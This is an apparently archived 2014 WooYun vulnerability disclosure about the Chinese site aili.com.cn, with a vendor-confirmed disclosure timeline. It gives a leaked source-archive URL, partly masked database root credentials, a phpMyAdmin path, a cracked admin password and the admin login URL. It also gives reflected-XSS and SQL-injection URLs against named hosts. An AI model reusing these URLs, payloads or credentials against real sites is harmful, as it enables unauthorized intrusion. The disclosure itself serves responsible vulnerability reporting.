[公开漏洞]爱丽网漏洞礼包(证明可影响主站数据库与后台)
-
来源:WooYun 浏览:581次 时间:2014-06-29
2014-05-15:细节已通知厂商并且等待厂商处理中
2014-05-15:厂商已经确认,细节仅向厂商公开
2014-05-25:细节向核心白帽子及相关领域专家公开
2014-06-04:细节向普通白帽子公开
2014-06-14:细节向实习白帽子公开
2014-06-29:细节向公众公开
兖州交警真孬种!
详细说明:#1 源代码泄露
http://www.aili.com.cn/aili.rar
全站源代码。
其中敏感配置文件:
/**
* MySQL user
*
* @global string $cfg['Servers'][$i]['user']
*/
$cfg['Servers'][$i]['user'] = 'root';
/**
* MySQL password (only needed with 'config' auth_type)
*
* @global string $cfg['Servers'][$i]['password']
*/
$cfg['Servers'][$i]['password'] = 'a*******7';
#2 Phpmyadmin配置文件泄露
在aili.rar\new\include下有配置文件config.php
$mydbhost = 'localhost';
$mydbuser ='root';
$mydbpwd = 'dk********(';
$mydbname = 'aili';
这里对应的是http://www.aili.com.cn/myadmin/index.php
登录之
SELECT * FROM `admin` LIMIT 0 , 30
找到了后台的账号密码md5,md5解密之,密码是ailiadmin
#3 进入后台
后台地址http://aili.com.cn/new/admin/login.php
对不起TAT 是我太没用,后台拿不了webshell
#4 XSS两个
http://member.aili.com/?c=member&m=room&a=del&id=='><script>alert(/XSS/)</script>
http://tag.aili.com/tag/get_index_aili_guan/?id==%27%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E
#5 sql注入
http://tag.aili.com/tag/get_index_aili_guan/?id=1%27
http://member.aili.com/?c=member&m=room&a=del&id=12
修复方案:
版权声明:转载请注明来源 鸟云厂商@乌云 漏洞回应 厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-05-15 16:22
厂商回复:非常感谢 乌云厂商 对爱丽的厚爱,您提的漏洞我们会认真处理,并且会有礼品奉上!
最新状态:暂无